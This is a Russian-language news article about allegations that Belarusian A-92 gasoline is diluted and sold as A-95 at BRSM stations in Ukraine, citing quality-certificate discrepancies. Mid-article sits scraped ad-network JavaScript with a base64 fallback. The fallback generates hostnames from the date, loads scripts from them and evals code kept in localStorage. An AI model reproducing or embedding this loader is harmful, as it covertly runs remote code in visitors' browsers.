Эксперт рассказал, как из белорусского бензина А-92 «бодяжат» А-95 и продают его на украинских АЗС

«Сорри, но это не белорусский бензин». Эксперт обратил внимание белорусских НПЗ и украинских потребителей на специфику рынка нефтепродуктов в нашей стране.

Директор Консалтинговой группы «А-95» Сергей Куюн в своей авторской колонке «Письмо сябрам» , опубликованной на сайте
enkorr, обратил внимание на структуру поставок бензинов белорусскими НПЗ, а также на проблемы с качеством продукции, реализуемой под «белорусскими» паспортами.

В частности, эксперт исследовал поставки белорусского бензина А-92 в адрес компании «Катма Груп», которая является специмпортером неформальной группы «БРСМ».

«Почему «Катма Груп» как ключевой поставщик «БРСМ» закупает на рынке, и в частности Беларуси, только бензин А-92, и только на «Нафтане»? Отвечаем: половину закупаемого объема «Катма Груп» продает легендарной компании «Стандартойл 2000». На станциях «БРСМ» она значится производителем всей линейки реализуемых там бензинов с октановым числом 95 (таких марок три)», — пишет С.Куюн.

По его словам, только в 2020 году «Катма Груп» продала «Стандартойл 2000» более 40 тыс. т белорусского А-92. В свою очередь «Стандартойл» вернул ей около 50 тыс. т бензина А-95 и 26 тыс. т так называемого альтернативного топлива (бензин с биоэтанолом).

«Полностью очевидно, что нафтановский «второй» служит базой в этом «производстве» А-95. Почему «Нафтан»? Почему не Мозырь или Кременчуг? Плотность новополоцкого продукта 0,736, тогда как мозырского – 0,746. В нем элементарно больше литров и для смешения он идеален», — отметил он.

Кроме того, исследование паспортов качества топлива показало, что под паспортами «Нафтана» на «БРСМ» продается какой-то другой бензин.

«Самые явные несоответствия: кислород, этанол, изобутиловый спирт, объемная часть простых эфиров, объемная часть других органических соединений. Содержание этих веществ в имеющемся паспорте качества «Нафтана» нулевое, есть даже отдельное примечание: спирты и эфиры при производстве бензина не использовались. А в «нафтановском» А-92 на «БРСМ» они уже есть. Обратим также внимание на отклонения фракционного состава. Да, все в пределах нормы, но сорри, это не белорусский бензин», — пишет автор. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

в Украине из белорусского А-92 «бодяжат» А-95, — эксперт Куюн

И если вышеприведенные манипуляции с бензином, по словам С.Куюна, оставили его в пределах нормативных значений, то в каждой пробе обнаружилось и по серьезному отклонению: в двух зашкалила сера и в одной всплыли амины.

«Все это говорит об одном: оригинальный продукт «Нафтана» был подвергнут воздействию, а проще говоря – разбодяжен. По каким-то параметрам угадали, а другие провалились. Классная система контроля качества…», — обратил внимание эксперт.

В итоге, отмечает директор «А-95», с одной половиной нафтановского бензина А-92 у «БРСМ» происходит неизвестно что, а из второй делают А-95. Притом делают таким образом, что его цена оказывается минимальной на рынке, притом как на А-92, так и на А-95.

«Друзья-белорусы, вам надо определиться. Если избыточный экспорт А-92 с «Нафтана» бьет по вашим крупнейшим клиентам – розничным сетям, а также создает обоснованное недовольство у украинских коллег-производителей, то разбавленный неизвестно чем А-92 уничтожает светлый облик высокого качества белорусских нефтепродуктов. А эту работу рынок начал еще до появления БНК в Украине, или уже более 10 лет. Оно точно того стоит? Вы уверены?» — спрашивает С.Куюн.

Как сообщал enkorr, Всеукраинская общественная организация «Институт потребительских экспертиз», специализирующаяся на контроле качества товаров широкого потребления, приняла решение остановить программы мониторинга контроля качества нефтепродуктов с сетями автозаправочных станций «БРСМ-Нафта», Мotto и SunOil. Об этом институт сообщил на своем сайте.

Ранее Акцент сообщал, на каких АЗС Украины продают некачественный бензин, который также может быть опасен для здоровья. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/ekspert-rasskazal-kak-iz-belorusskogo-benzina-a-92-bodyazhat-a-95-i-prodayut-ego-na-ukrainskih-azs/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top